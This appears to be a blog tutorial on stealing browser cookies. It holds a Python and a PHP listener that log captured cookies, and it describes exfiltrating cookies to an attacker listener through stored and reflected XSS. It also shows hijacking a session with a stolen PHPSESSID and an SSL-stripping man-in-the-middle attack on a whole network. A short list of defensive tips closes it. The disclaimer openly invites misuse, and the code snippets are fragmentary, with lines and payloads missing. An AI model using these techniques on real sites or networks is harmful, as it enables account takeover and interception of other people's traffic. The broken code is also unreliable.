Disclaimer: You are free to use presented knowledge for educational purposes, with good intentions (securing web applications, penetration testing, ctf’s etc.), or not. I am not responsible for anything you do.
This article will explain some of the common HTTP state interception methods.
At the base of our actions we need a listener.
If your target is outside the NAT then corresponding port forwarding will be needed too.
You can also use a web service similar to
Requestbin (public hosting discontinued unfortunately).
Below I am giving out a very simple solution written in python3.
with open('cookies.txt', 'a') as xss:
def run(server_class=http.server.HTTPServer, handler_class=S, port=443):
server_address = ('', port)
httpd = server_class(server_address, handler_class)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile=sys.argv, server_side=True)
print('[*] Serving at '+str(server_address))
if __name__ == "__main__":
if(len(sys.argv) == 2):
print("Specify cert file")
You can then connect to it and test if it works.
openssl s_client -connect localhost:443
For the case of my article I’ve chosen to use simple built-in PHP http server as we are not interacting with SSL traffic.
Let’s create something quick in PHP language.
$string = $_GET['xss'];
$handle = fopen('xss.txt', 'a');
In shorter words it just saves the received cookie into a file.
Start the server with elevated privileges.
sudo php -S 0.0.0.0:80 -f index.php -t .
- -S 0.0.0.0:80 - Listen on all interfaces, port 80
- -f index.php - Specified file to parse
- -t . - Directory root (dot means current directory)
Basically we are creating a new image object, source of which points to our listener at 192.168.1.101, and while it is requesting to load a fake image, we capture the URL parameter containing the cookie.
At first let’s test it locally with help of the developer console and then we’ll move out to injecting a script in non-physical access based situations.
If you’ve had received the cookie, then you’ve done everything correctly. Congratulations 😀
document.cookie = "PHPSESSID=rqc8ictmojuag6c4k464end6n4";
We can also set it in the storage tab.
If you craft requests by hand, pass the cookie manually in the HTTP request header.
Let’s move to the basic XSS topic.
The first XSS exploitation technique I will showcase is called stored XSS. We will be targetting a vulnerable input that allows us to add an unsanitized comment. The exploitation is persistent as the payload is being constantly red from the database.
<!-- Comment contents
I encoded the payload in char code and then used eval to run it on body load event -->
Wow, I really like your site
- Once the user logs in and reads the comments, we get his cookie.
Another technique is called reflected XSS and this time we will need the user to click on a prepared link that injects the payload using an unsanitized input.
Generally, if there is a field that loads a string from the URL and does not filter anything before rendering it, then Reflected XSS is possible.
There is a vulnerable search field on this web app, let’s exploit it and send our link to the user.
// This is the same payload, but I encoded it for URL and added "White Dog" before.
Last technique I will cover in this article does not need precision to succeed.
It involves sniffing on the network, redirecting HTTPS traffic into HTTP, proxying the packets and then injecting the payload in real time.
We will use a great framework made by Marcello Salvati.
sudo php -S 0.0.0.0:8000 -f index.php -t . &
- -i wlp2s0 - Use interface wlp2s0
- –spoof - spoof the packets
- –hsts - try to strip SSL
- –netmask 192.168.1.0/24 - set network mask
- –gateway 192.168.1.1 - set the gateway
After a while, we could notice that every single device on the network sends us cookies from most of the HTTP requests they’ve sent.
- Web devs - sanitize your inputs.
- Verify whether sites you own do not contain something unexpected in the source code or the database.
- Do not trust every email.
- Verify what links you click on.
- Ring a bell when your connection suddenly loses SSL. (Verify the padlock icon in a web browser)
- Connect only to trusted networks. (Open WiFis are not trusted)
- If you detect a Man in the Middle attack in your packet captures, do not ignore the threat.
I wish you a good luck 😎